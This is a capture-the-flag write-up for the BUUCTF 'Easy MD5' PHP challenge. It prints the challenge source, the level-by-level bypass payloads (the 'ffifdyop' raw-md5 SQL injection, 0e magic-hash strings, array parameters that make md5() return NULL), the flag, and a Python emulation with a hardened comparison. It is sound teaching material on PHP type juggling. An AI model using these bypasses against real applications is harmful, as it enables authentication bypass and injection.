BUUCTF WEB [BJDCTF2020]Easy MD5
Source code
leveldo.php
<?php
header('hint:select * from \'admin\' where password='.'md5($pass,true)');
?>
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
@media all and (min-width:600px) {
* {
/* make width include the border and padding */
box-sizing: border-box;
}
body {
/* center the page content horizontally and vertically */
position: relative;
display: flex;
height: 550px;
align-items: center;
justify-content: center;
background-size: cover;
background-repeat: no-repeat;
}
/*container*/
.container {
border: rgba(240, 235, 235, 0.932) solid 3px;
box-shadow: 10px 10px 10px rgba(173, 173, 173, 0.61);
background-color: white;
width: 30%;
height: 20%;
border-radius: 8px;
position: relative;
}
/*container end*/
/*header*/
#header h1 {
position: relative;
text-align: center;
}
/*header end*/
/*main*/
.main {
align-items: center;
justify-content: center;
position: relative;
width: 100%;
height: 100%;
}
.main section {
width: 50%;
margin-left: 22%;
}
.main section .upload {
width: 400px;
}
.main section .upload .in{
margin-top: 10%;
border-radius:10px;
font-size: 17px;
color: rgba(44, 44, 44, 0.582);
font-family: "Microsoft YaHei";
border: rgba(240, 235, 235, 0.932) solid 3px;
box-shadow: 10px 10px 10px rgba(173, 173, 173, 0.61);
background-color: white;
}
.main section .upload .give{
margin-left: 10px;
border-radius:10px;
color: rgba(44, 44, 44, 0.582);
font-size: 17px;
font-family: "Microsoft YaHei";
border: white solid 3px;
background-color: white;
}
/*main end*/
}
</style>
</head>
<body>
<div class="container">
<div id="header">
</div><!-- /header end -->
<div class="main">
<section>
<form class="upload" action="leveldo4.php" method="GET">
<input type="text" id="name" name='password' class="in">
<input type="submit" class="give">
</form>
</section>
</div><!-- /main end -->
</div><!-- /container end -->
<script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
</body>
</html>
<?php
error_reporting(0);
$password = $_GET['password'];
if($password == 'ffifdyop')
{
echo "<script>window.location.replace('./levels91.php')</script>";
}
?>
levels91.php
<!--
$a = $_GET['a'];
$b = $_GET['b'];
if($a != $b && md5($a) == md5($b)){
header('Location: levell14.php');
}
-->
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
span {
position: relative;
display: flex;
width: 100%;
height: 700px;
align-items: center;
font-size: 70px;
font-family:'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
justify-content: center;
}
</style>
</head>
<body>
<span>Do You Like MD5?</span>
</body>
</html>
<?php
error_reporting(0);
$a = $_GET['a'];
$b = $_GET['b'];
if($a != $b && md5($a) == md5($b)){
echo "<script>window.location.replace('./levell14.php')</script>";
}
?>
levell14.php
<?php
error_reporting(0);
include "flag.php";
highlight_file(__FILE__);
if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
echo $flag;
}
flag.php
<?php
$flag = file_get_contents('/flag');
Analysis
Key code in leveldo.php:
$password = $_GET['password'];
if($password == 'ffifdyop')
{
echo "<script>window.location.replace('./levels91.php')</script>";
}
Enter ffifdyop in the text field and submit; the page redirects to levels91.php. (The `hint` response header sent by leveldo.php shows where this value comes from: the query it describes hashes the password with md5($pass, true).)
Key code in levels91.php:
$a = $_GET['a'];
$b = $_GET['b'];
if($a != $b && md5($a) == md5($b)){
echo "<script>window.location.replace('./levell14.php')</script>";
}
This is a loose-comparison (weak type) bypass of md5 applied to both inputs:
md5("s1885207154a") => 0e509367213418206700842008763514
md5("s1836677006a") => 0e481036490867661113260034900752
Both strings hash to values beginning with 0e followed only by digits. PHP treats such strings as numeric strings in scientific notation, so == compares them as numbers; whatever the digits after 0e are, both sides evaluate to 0 and the comparison succeeds.
So the payload can be constructed as:
/levels91.php?a=s1885207154a&b=s1836677006a
This redirects to levell14.php, whose key code is:
if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
echo $flag;
}
PHP has a quirk here:
md5([1,2,3]) == md5([4,5,6]) == NULL
md5() returns NULL when given an array (the warning it emits is hidden by error_reporting(0)), so passing arrays bypasses this filter: [1] and [2] are not identical, but NULL === NULL holds. POST body:
param1[]=1&param2[]=2
This returns the flag:
flag{808e87d7-e419-4fab-a9f4-007d229b4c0f}
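As an added example (not the challenge's or the writeup's code), the Python below emulates the PHP comparison rules each of the three levels depends on, so the payloads above can be verified offline and contrasted with a check that resists them. It assumes PHP 7 semantics for md5() on arrays; function names such as `php_loose_eq` and `is_magic_hash` are my own.

```python
import hashlib
import hmac
import re

# Constructed example (not the challenge's or the writeup's code): emulates the
# PHP behaviours each level relies on so the bypasses can be checked offline.
# Shape of a PHP numeric string: optional sign, digits, optional fraction/exponent.
NUMERIC_STR = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")

def php_loose_eq(a: str, b: str) -> bool:
    """PHP '==' on two strings: if both are numeric strings they are compared
    as numbers, so '0e509...' == '0e481...' because 0 * 10^n is 0 either way."""
    if NUMERIC_STR.match(a) and NUMERIC_STR.match(b):
        return float(a) == float(b)
    return a == b

def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()

def is_magic_hash(s: str) -> bool:
    """True when md5(s) is '0e' followed only by digits, i.e. numerically zero."""
    return re.fullmatch(r"0e\d{30}", md5_hex(s)) is not None

def level_two_bypass(a: str, b: str) -> bool:
    """levels91.php: $a != $b && md5($a) == md5($b), both with loose comparison."""
    return not php_loose_eq(a, b) and php_loose_eq(md5_hex(a), md5_hex(b))

def php7_md5(value):
    """PHP 7 md5() returns NULL for an array (the warning is hidden by
    error_reporting(0)); PHP 8 throws a TypeError instead, which ends the bypass."""
    return None if isinstance(value, (list, dict)) else md5_hex(value)

def level_three_bypass(p1, p2) -> bool:
    """levell14.php: param1 !== param2 && md5(param1) === md5(param2);
    two different arrays are not identical, but NULL === NULL holds."""
    return p1 != p2 and php7_md5(p1) == php7_md5(p2)

def strict_hash_eq(a, b) -> bool:
    """Hardened check: reject non-strings and compare hex digests byte by byte
    in constant time, so numeric-string juggling never applies."""
    if not isinstance(a, str) or not isinstance(b, str):
        return False
    return hmac.compare_digest(md5_hex(a), md5_hex(b))

def raw_md5_prefix(s: str, n: int = 5) -> bytes:
    """Level one's hint uses md5($pass, true): raw digest bytes, which can
    contain quote characters and must never be concatenated into SQL."""
    return hashlib.md5(s.encode()).digest()[:n]
```

Running `raw_md5_prefix("ffifdyop")` shows why that particular password satisfies the hinted query: its raw digest starts with the bytes `'or'6`.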